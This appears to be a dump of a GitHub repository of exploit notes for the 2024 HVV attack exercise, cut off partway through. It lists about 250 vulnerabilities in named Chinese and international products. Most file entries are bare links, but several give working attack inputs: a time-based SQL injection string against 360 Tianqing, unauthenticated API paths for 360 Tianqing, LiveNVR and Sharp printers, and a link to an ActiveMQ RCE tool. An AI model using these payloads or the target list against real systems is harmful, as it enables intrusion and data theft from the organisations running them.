├── .gitattributes ├── 1Panel 远程代码执行漏洞(XVE-2024-17699).md ├── 1Panel面板最新前台RCE漏洞.md ├── 29网课交单平台epay.php存在SQL注入漏洞.md ├── 360 新天擎终端安全管理系统存在信息泄露漏洞.md ├── 360天擎 - sql注入.md ├── 360天擎 - 未授权访问.md ├── AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md ├── AJ-Report开源数据大屏存在远程命令执行漏洞.md ├── APP分发签名系统index-uplog.php存在任意文件上传漏洞.md ├── Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md ├── Apache ActiveMQ远程命令执行漏洞.md ├── Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md ├── Array VPN任意文件读取漏洞.md ├── Bazarr swaggerui任意文件读取漏洞.md ├── Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md ├── Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md ├── Confluence远程命令执行漏洞(CVE-2024-21683).md ├── Coremail邮件系统未授权访问获取管理员账密.md ├── D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md ├── DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md ├── DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md ├── Docassemble任意文件读取漏洞(CVE-2024-27292).md ├── F-logic DataCube3存在命令执行漏洞.md ├── F5 BIG-IP 远程代码执行漏洞.md ├── H3C Magic B1STV100R012 RCE.md ├── H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md ├── H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md ├── H3C-CVM-upload接口前台任意文件上传漏洞.md ├── H3C-SecParh堡垒机任意用户登录漏洞.md ├── H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md ├── H3C密码泄露漏洞.md ├── H3C网络管理系统任意文件读取漏洞.md ├── IP网络广播服务平台存在任意文件上传漏洞.md ├── JeePlus快速开发平台resetpassword存在SQL注入漏洞.md ├── JeecgBoot反射型XSS漏洞.md ├── JeecgBoot积木报表存在SQL注入.md ├── Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md ├── KubePi存在JWT验证绕过漏洞.assets └── image-20240806095638556.png ├── KubePi存在JWT验证绕过漏洞.md ├── LiveNVR流媒体服务软件存在未授权访问漏洞.md ├── Netgear-WN604接口downloadFile.php信息泄露漏洞.md ├── Panalog 日志审计系统 SQL 注入漏洞.md ├── Quicklancer存在SQL注入漏洞.md ├── RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md ├── README.md ├── ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md ├── Sharp 多功能打印机未授权访问漏洞.md ├── SpringBlade系统menu接口存在SQL注入漏洞.md ├── SuiteCRM responseEntryPoint存在SQL注入漏洞.md ├── T18-1TOTOLINK-A6000R-RCE.md ├── Tenda 03 代码执行漏洞(CVE-2024-6963).md ├── Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md ├── Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md ├── Untitled.md ├── WVP视频平台(国标28181)未授权SQL注入漏洞.md ├── aiohttp存在目录遍历漏洞(CVE-2024-23334).md ├── eking管理易FileUpload接口存在任意文件上传漏洞.md ├── fogproject系统接口export.php存在远程命令执行漏洞.md ├── panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md ├── 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md ├── 万户OA SQL注入漏洞.md ├── 万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md ├── 万户ezoffice wpsservlet任意文件上传.md ├── 万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞.md ├── 九思-OA-任意文件上传.md ├── 云时空商业ERP文件上传.md ├── 云课网校系统uploadImage存在任意文件上传漏洞.md ├── 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md ├── 亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md ├── 任我行协同CRM反序列化漏洞.md ├── 全息AI网络运维平台存在命令执行漏洞.md ├── 创客13星零售商城系统RCE.md ├── 创客13星零售商城系统前台任意文件上传漏洞.md ├── 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md ├── 华天动力-OA-downloadWpsFile任意文件读取.md ├── 华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md ├── 华磊科技物流modifyInsurance sql注入漏洞.md ├── 同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md ├── 启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md ├── 启明星辰-天清汉马VPN接口download任意文件读取.md ├── 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md ├── 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md ├── 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md ├── 喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md ├── 因酷教育平台RCE(CVE-2024-35570).md ├── 天玥网络安全审计系统 SQL 注入漏洞.md ├── 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md ├── 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md ├── 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md ├── 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md ├── 好视通视频会议系统存在任意文件读取漏洞.md ├── 安恒-下一代防火墙-RCE.md ├── 安恒明御安全网关rce.md ├── 安恒明御安全网关远程命令执行漏洞.md ├── 宏景eHR sdutygetSdutyTree SQL注入.md ├── 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md ├── 宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md ├── 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md ├── 小学智慧校园信息管理系统 Upload 文件上传漏洞.assets └── image-20240729093018380.png ├── 小学智慧校园信息管理系统 Upload 文件上传漏洞.md ├── 山石网科云鉴存在前台任意命令执行漏洞.md ├── 帆软FineReport报表 ReportServer SQL注入getshell.md ├── 帆软报表 channel 远程命令执行漏洞.md ├── 帆软未授权命令执行.md ├── 广州图创-图书馆集群管理系统-PermissionAC.md ├── 广联达-Linkworks-GetAllData接口存在未授权访问.md ├── 广联达Linkworks ArchiveWebService XML实体注入漏洞.md ├── 广联达OA接口ArchiveWebService存在XML实体注入漏洞.md ├── 建文工程管理系统 download2 文件读取漏洞.md ├── 建文工程管理系统desktop.ashx存在SQL注入漏洞.md ├── 建文工程项目管理软件BusinessManger存在SQL注入漏洞.md ├── 微信公众平台-无限回调系统-SQL注入.md ├── 拓尔思-TRSWAS5.0-PermissionAC文件上传.md ├── 拓尔思TRS媒资管理系统任意文件上传.md ├── 指尖云平台-智慧政务payslip SQL注入漏洞.md ├── 捷诚管理信息系统 SQL注入漏洞.md ├── 数字通云平台智慧政务 time SQL注入漏洞.md ├── 数字通指尖云平台-智慧政务payslip SQL注入漏洞.md ├── 方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md ├── 方天云智慧平台系统文件上传.md ├── 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md ├── 易宝OA ExecuteSqlForSingle SQL注入漏洞.md ├── 易宝OA 存在BasicService存在任意文件上传漏洞.assets └── image-20240729092805340.png ├── 易宝OA 存在BasicService存在任意文件上传漏洞.md ├── 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md ├── 汇智ERP filehandle.aspx 任意文件读取漏洞.md ├── 泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md ├── 泛微E-Mobile installOperate.do SSRF漏洞.md ├── 泛微E-cology9 browserjsp SQL注入漏洞.md ├── 泛微E-office-10接口leave_record.php SQL注入漏洞.md ├── 泛微HrmService存在SQL注入漏洞.md ├── 泛微OA E-Cology存在SQL注入漏洞.md ├── 泛微OA E-Office V10 OfficeServer 任意文件上传.md ├── 泛微e-cology9 存在SSRF漏洞.md ├── 泛微ecology系统setup接口存在信息泄露漏洞.md ├── 泛微云桥文件上传.md ├── 浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc2.md ├── 浪潮云财务系统 bizintegrationwebservice.asmx 命令执行.md ├── 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞.md ├── 海康卫视综合安防 uploadAllPackage任意文件上传.md ├── 海康威视教育综合安防管理系统admintoken泄露.md ├── 海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md ├── 海康威视综合安防管理平台前台RCE.md ├── 海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md ├── 润乾报表InputServlet存在任意文件上传漏洞.md ├── 润乾报表dataSphereServlet 任意文件上传漏洞.md ├── 润乾报表dataSphereServlet接口 任意文件读取漏洞.md ├── 深信服-下一代防火墙-RCE.md ├── 深信服下一代防火墙NGAF存在任意文件上传漏洞.md ├── 深澜计费管理系统strategy存在反序列化漏洞.md ├── 湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md ├── 满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md ├── 猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md ├── 瑞斯康达-多业务智能网关-RCE.md ├── 瑞斯康达多业务智能网关RCE.md ├── 甄云 SRM 云平台 SpEL 表达式注入漏洞.md ├── 用友 NC Cloud jsinvoke 任意文件上传.md ├── 用友 U8 cloud MonitorServlet 反序列化漏洞.md ├── 用友 UAP querygoodsgridbycode SQL 注入.md ├── 用友-CRM客户关系管理系统-任意文件上传.md ├── 用友-U8-Cloud-文件上传.md ├── 用友-畅捷通CRM-任意文件上传.md ├── 用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md ├── 用友NC Cloud queryStaffByName SQL注入漏洞.md ├── 用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md ├── 用友NC-UserAuthenticationServlet存在反序列化漏洞.md ├── 用友NC任意文件读取.md ├── 用友NC及U8cloud LoggingConfigServlet 反序列化漏洞.md ├── 用友U8 CRM import.php 文件上传漏洞.md ├── 用友U8 Cloud ActionServlet SQL注入漏洞.md ├── 用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md ├── 用友U8 Cloud linkntb存在SQL注入漏洞.md ├── 用友U9-UMWebService.asmx存在文件读取漏洞.md ├── 用友U9系统DoQuery接口存在SQL注入.md ├── 用友u8-cloud RegisterServlet SQL注入.md ├── 用友时空KSOA PreviewKPQT SQL注入漏洞.md ├── 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md ├── 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md ├── 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md ├── 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md ├── 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md ├── 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md ├── 电信网关 ipping.php 命令执行漏洞.assets └── image-20240729092933849.png ├── 电信网关 ipping.php 命令执行漏洞.md ├── 百易云资产管理运营系统任意文件上传.md ├── 禅道研发项⽬管理系统未授权.md ├── 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md ├── 福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞.md ├── 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md ├── 福建科立讯通信指挥调度管理平台任意文件上传.md ├── 科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md ├── 科荣 AIO 管理系统任意文件读取.md ├── 科荣AIO moffice SQL注入漏洞.md ├── 科荣AIO系统UtilServlet存在任意命令执行漏洞.md ├── 科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md ├── 科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md ├── 竹云 信息泄露.md ├── 紫光-电子档案管理系统-PermissionAC.md ├── 红海云eHR kqFile.mob 任意文件上传.md ├── 绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md ├── 网康 NS-ASG sql 注入漏洞.md ├── 网康 NS-ASG 信息泄露漏洞.md ├── 网神SecSSL3600安全接入网关系统任意密码修改漏洞.md ├── 联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞.md ├── 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md ├── 致远 OA fileUpload.do 前台文件上传绕过漏洞.md ├── 致远AnalyticsCloud 分析云存在任意文件读取漏洞.md ├── 致远constDef接囗存在代码执行漏洞.md ├── 致远互联-M1移动协同办公管理软件-RCE.md ├── 致远互联FE协作办公平台apprvaddNew存在SQL注入.md ├── 蓝凌 EKP 远程代码执行漏洞.md ├── 蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md ├── 蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md ├── 蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md ├── 蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md ├── 蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md ├── 蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md ├── 蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md ├── 西软云XMS-futurehoteloperate接口存在XXE漏洞.md ├── 证书查询系统存在任意文件读取漏洞.md ├── 资管云--任意文件上传.md ├── 赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md ├── 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md ├── 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md ├── 超级猫签名APP分发平台前台存在SQL注入漏洞.md ├── 超级猫签名APP分发平台前台远程文件写入漏洞.md ├── 迈普-多业务融合网关-信息泄露.md ├── 通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md ├── 通达OA V11.10 login.php SQL注入漏洞.md ├── 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md ├── 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md ├── 金万维云联应用系统接入平台RCE.md ├── 金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md ├── 金和OA jc6 clobfield SQL注入漏洞.md ├── 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md ├── 金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md ├── 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md ├── 金和OA_CarCardInfo.aspx_SQL注入漏洞.md ├── 金和OA_HomeService.asmxSQL注入.md ├── 金和OA_MailTemplates.aspx_SQL注入漏洞.md ├── 金和OA_SAP_B1Config.aspx未授权访问漏洞.md ├── 金和OA_jc6_Upload任意文件上传.md ├── 金和OA_jc6_ntko-upload任意文件上传漏洞.md ├── 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md ├── 金和OA_upload_json.asp存在任意文件上传漏洞.md ├── 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md ├── 金和OA任意文件读取漏洞.md ├── 金慧综合管理信息系统SQL注入漏洞.md ├── 铭飞MCMS 远程代码执行漏洞.md ├── 锐捷-EG易网关存在RCE漏洞.md ├── 锐捷EG350易网关管理系统存在信息泄露漏洞.md ├── 锐捷M18000-WS-ED无线控制器存在CRL命令注入.md ├── 锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md ├── 锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞.md ├── 锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md ├── 飞企互联loginService任意登录.md ├── 飞讯云MyImportData前台SQL注入.md ├── 飞讯云WMS MyDownMylmportData 前台SQL注入.md └── 魔方网表 mailupdate.jsp 接口 任意文件上传.md /.gitattributes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/.gitattributes -------------------------------------------------------------------------------- /1Panel 远程代码执行漏洞(XVE-2024-17699).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/1Panel 远程代码执行漏洞(XVE-2024-17699).md -------------------------------------------------------------------------------- /1Panel面板最新前台RCE漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/1Panel面板最新前台RCE漏洞.md -------------------------------------------------------------------------------- /29网课交单平台epay.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/29网课交单平台epay.php存在SQL注入漏洞.md -------------------------------------------------------------------------------- /360 新天擎终端安全管理系统存在信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /runtime/admin_log_confcache 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /360天擎 - sql注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)-- 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /360天擎 - 未授权访问.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /api/dp/rptsvcsyncpoint?ccid=1 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md -------------------------------------------------------------------------------- /AJ-Report开源数据大屏存在远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/AJ-Report开源数据大屏存在远程命令执行漏洞.md -------------------------------------------------------------------------------- /APP分发签名系统index-uplog.php存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md -------------------------------------------------------------------------------- /Apache ActiveMQ远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | https://github.com/Hutt0n0/ActiveMqRCE 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md -------------------------------------------------------------------------------- /Array VPN任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Array VPN任意文件读取漏洞.md -------------------------------------------------------------------------------- /Bazarr swaggerui任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Bazarr swaggerui任意文件读取漏洞.md -------------------------------------------------------------------------------- /Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md -------------------------------------------------------------------------------- /Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md -------------------------------------------------------------------------------- /Confluence远程命令执行漏洞(CVE-2024-21683).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Confluence远程命令执行漏洞(CVE-2024-21683).md -------------------------------------------------------------------------------- /Coremail邮件系统未授权访问获取管理员账密.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Coremail邮件系统未授权访问获取管理员账密.md -------------------------------------------------------------------------------- /D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md -------------------------------------------------------------------------------- /DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md -------------------------------------------------------------------------------- /DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md -------------------------------------------------------------------------------- /Docassemble任意文件读取漏洞(CVE-2024-27292).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Docassemble任意文件读取漏洞(CVE-2024-27292).md -------------------------------------------------------------------------------- /F-logic DataCube3存在命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/F-logic DataCube3存在命令执行漏洞.md -------------------------------------------------------------------------------- /F5 BIG-IP 远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/F5 BIG-IP 远程代码执行漏洞.md -------------------------------------------------------------------------------- /H3C Magic B1STV100R012 RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C Magic B1STV100R012 RCE.md -------------------------------------------------------------------------------- /H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md -------------------------------------------------------------------------------- /H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md -------------------------------------------------------------------------------- /H3C-CVM-upload接口前台任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C-CVM-upload接口前台任意文件上传漏洞.md -------------------------------------------------------------------------------- /H3C-SecParh堡垒机任意用户登录漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C-SecParh堡垒机任意用户登录漏洞.md -------------------------------------------------------------------------------- /H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md -------------------------------------------------------------------------------- /H3C密码泄露漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C密码泄露漏洞.md -------------------------------------------------------------------------------- /H3C网络管理系统任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/H3C网络管理系统任意文件读取漏洞.md -------------------------------------------------------------------------------- /IP网络广播服务平台存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/IP网络广播服务平台存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /JeePlus快速开发平台resetpassword存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/JeePlus快速开发平台resetpassword存在SQL注入漏洞.md -------------------------------------------------------------------------------- /JeecgBoot反射型XSS漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/JeecgBoot反射型XSS漏洞.md -------------------------------------------------------------------------------- /JeecgBoot积木报表存在SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/JeecgBoot积木报表存在SQL注入.md -------------------------------------------------------------------------------- /Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md -------------------------------------------------------------------------------- /KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png -------------------------------------------------------------------------------- /KubePi存在JWT验证绕过漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/KubePi存在JWT验证绕过漏洞.md -------------------------------------------------------------------------------- /LiveNVR流媒体服务软件存在未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /api/v1/device/channeltree?serial=&pcode 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /Netgear-WN604接口downloadFile.php信息泄露漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Netgear-WN604接口downloadFile.php信息泄露漏洞.md -------------------------------------------------------------------------------- /Panalog 日志审计系统 SQL 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Panalog 日志审计系统 SQL 注入漏洞.md -------------------------------------------------------------------------------- /Quicklancer存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Quicklancer存在SQL注入漏洞.md -------------------------------------------------------------------------------- /RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/README.md -------------------------------------------------------------------------------- /ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md -------------------------------------------------------------------------------- /Sharp 多功能打印机未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /installed_emanual_list.html 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /SpringBlade系统menu接口存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/SpringBlade系统menu接口存在SQL注入漏洞.md -------------------------------------------------------------------------------- /SuiteCRM responseEntryPoint存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/SuiteCRM responseEntryPoint存在SQL注入漏洞.md -------------------------------------------------------------------------------- /T18-1TOTOLINK-A6000R-RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/T18-1TOTOLINK-A6000R-RCE.md -------------------------------------------------------------------------------- /Tenda 03 代码执行漏洞(CVE-2024-6963).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Tenda 03 代码执行漏洞(CVE-2024-6963).md -------------------------------------------------------------------------------- /Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md -------------------------------------------------------------------------------- /Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md -------------------------------------------------------------------------------- /Untitled.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /WVP视频平台(国标28181)未授权SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/WVP视频平台(国标28181)未授权SQL注入漏洞.md -------------------------------------------------------------------------------- /aiohttp存在目录遍历漏洞(CVE-2024-23334).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/aiohttp存在目录遍历漏洞(CVE-2024-23334).md -------------------------------------------------------------------------------- /eking管理易FileUpload接口存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/eking管理易FileUpload接口存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /fogproject系统接口export.php存在远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/fogproject系统接口export.php存在远程命令执行漏洞.md -------------------------------------------------------------------------------- /panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md -------------------------------------------------------------------------------- /万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md: -------------------------------------------------------------------------------- 